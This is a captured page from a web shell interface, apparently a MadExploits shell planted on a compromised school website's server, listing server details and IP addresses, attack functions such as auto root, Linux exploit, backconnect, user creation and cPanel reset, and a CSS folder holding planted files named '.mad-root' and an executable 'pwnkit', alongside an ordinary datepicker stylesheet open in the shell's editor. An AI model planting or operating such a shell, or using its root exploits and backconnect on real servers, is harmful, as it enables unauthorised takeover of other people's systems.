Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.223.238.150
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
nbs_website /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Lobibox.min.css
21.54
KB
-rw-r--r--
alert.mob.css
1.8
KB
-rw-r--r--
bootstrap-iso.css
204.01
KB
-rw-r--r--
bootstrap.css
133.86
KB
-rw-r--r--
default.css
5.65
KB
-rw-r--r--
jquery-ui-1.10.1.css
21.33
KB
-rw-r--r--
jquery-ui.min.css
26.43
KB
-rw-r--r--
jquery.dateselect.css
3.15
KB
-rw-r--r--
jquery.datetimepicker.css
17.99
KB
-rw-r--r--
lugo.datepicker.css
5.13
KB
-rw-r--r--
modal.css
3.45
KB
-rw-r--r--
pikaday.css
4.16
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.css
5.95
KB
-rw-r--r--
timepicki.css
1.31
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.dateselect.css
/** * jQuery DateSelect * @author biohzrdmx <github.com/biohzrdmx> * @license MIT */ .date-select { position: absolute; } .date-select .popup { position: absolute; left: 0; top: 0; width: 302px; height: 141px; padding: 1px; z-index: 15; background: #FFF; border: 1px solid #CCC; /* box-shadow */ -webkit-box-shadow: 2px 2px 6px rgba(0, 0, 0, 0.3); box-shadow: 2px 2px 6px rgba(0, 0, 0, 0.3); /* box-sizing */ -webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box; } .date-select .tip { position: absolute; left: 12px; top: -12px; z-index: 5; width: 0; height: 0; border-left: 10px solid transparent; border-right: 10px solid transparent; border-bottom: 12px solid #CCC; } .date-select .tip:before { content: ' '; position: absolute; left: -8px; top: 2px; z-index: 20; width: 0; height: 0; border-left: 8px solid transparent; border-right: 8px solid transparent; border-bottom: 10px solid #FFF; } .date-select .select { width: 100px; height: 100px; float: left; margin-right: 1px; color: #222; position: relative; cursor: default; } .date-select .select.year { margin-right: 0; } .date-select .select span { display: block; margin: 0 10px 0; } .date-select .select span.num { font-size: 34px; position: absolute; left: 0; bottom: 28px; color: #555; } .date-select .select span.text { font-size: 12px; text-transform: uppercase; position: absolute; left: 0; bottom: 18px; } .date-select .select:hover { background: #1196CE; color: #FFF; } .date-select .select:hover span { color: #FFF; } .date-select .select a.btn-arrow { position: absolute; } .date-select .select a.btn-arrow.btn-up { left: 0; top: 0; width: 100%; height: 20px; } .date-select .select a.btn-arrow.btn-down { left: 0; bottom: 0; width: 100%; height: 20px; } .date-select .select .icon { display: block; margin: 7px auto; width: 0; height: 0; /* transition */ -webkit-transition: opacity 0.3s; -moz-transition: opacity 0.3s; -ms-transition: opacity 0.3s; -o-transition: opacity 0.3s; transition: opacity 0.3s; /* opacity */ filter: alpha(opacity=0); opacity: 0; } .date-select .select .icon.icon-up { border-left: 5px solid transparent; border-right: 5px solid transparent; border-bottom: 6px solid #87CAE6; } .date-select .select .icon.icon-down { border-left: 5px solid transparent; border-right: 5px solid transparent; border-top: 6px solid #87CAE6; } .date-select .select:hover .icon { /* opacity */ filter: alpha(opacity=100); opacity: 1; } .date-select .select a.btn-arrow:hover .icon.icon-up { border-bottom-color: #FFF; } .date-select .select a.btn-arrow:hover .icon.icon-down { border-top-color: #FFF; } .date-select .buttons { margin: 101px auto 0; width: 302px; } .date-select .buttons a { display: block; width: 151px; height: 40px; color: #343434; text-align: center; line-height: 40px; font-size: 18px; float: left; } .date-select .buttons a:hover { color: #FFF; } .date-select .buttons a.btn-ok { width: 150px; margin-left: 1px; } .date-select .buttons a.btn-ok:hover { background: #69B22C; } .date-select .buttons a.btn-cancel:hover { background: #D95005; }
Close